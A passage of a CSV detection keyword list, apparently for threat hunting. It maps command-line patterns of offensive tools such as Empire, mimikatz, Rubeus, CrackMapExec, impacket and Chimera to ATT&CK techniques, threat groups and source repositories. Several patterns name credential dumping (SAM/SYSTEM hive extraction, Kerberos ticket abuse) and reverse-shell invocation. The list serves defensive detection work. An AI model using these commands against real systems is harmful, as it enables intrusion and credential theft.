Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,0,Invoke-PowerShellTcp args,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -* reverse_shell_generator*,offensive_tool_keyword,reverse-shell-generator,Hosted Reverse Shell generator with a ton of functionality,T1059 T1071,N/A,N/A,N/A,POST Exploitation tools,https://github.com/0dayCTF/reverse-shell-generator,1,0,N/A,N/A,10,2271,510,2023-08-12T15:06:21Z,2021-02-27T00:53:13Z -* reverse-index.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -RevToSelf *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Get-System.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* rexec-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rfc868-time.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Rhost * -WARFile http*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Rhosts * -Password * -Directory * -Dictionary *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,HTTP-Login.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -Rhosts * -Path *.txt -Port *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Find-Fruit.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* riak-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --rid-brute 2>&1 *.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --rid-brute*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* rid-hijack -*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* -rl 4 -ta 8 -t 2100 -an AS8560*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* rlogin-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rmi-dumpregistry.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rmi-vuln-classloader.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rockyou.txt *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --rogue-smbserver-ip *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --rogue-smbserver-share *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* ropbuffers.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* ropfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,0,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -* rpcap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpcap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpc-grind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpcinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsa-vuln-roca.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsync-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsync-list-modules.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rtsp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rtsp-url-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Rubeus -Command *kerberoast*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* ruler.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* --rules:Jumbo *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* run donpapi*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -* RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* -runaslsass*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -* rusers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rustbof *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -* rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -* -s * -c command_exec --execute *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c disable_wdigest *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c disable_winrm *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c enable_wdigest *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c enable_winrm *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c remote_posh *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * --method 1 --function shell_exec --parameters cmd:id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -s *ascii* -b *reverse*invoke-expression*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* -s putty.exe_sig *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*' s::l '*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* s4u * /bronzebit*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u * /nopac*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u */rc4:* ,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s7-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -sam * -system * -security * LOCAL > *.out*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* 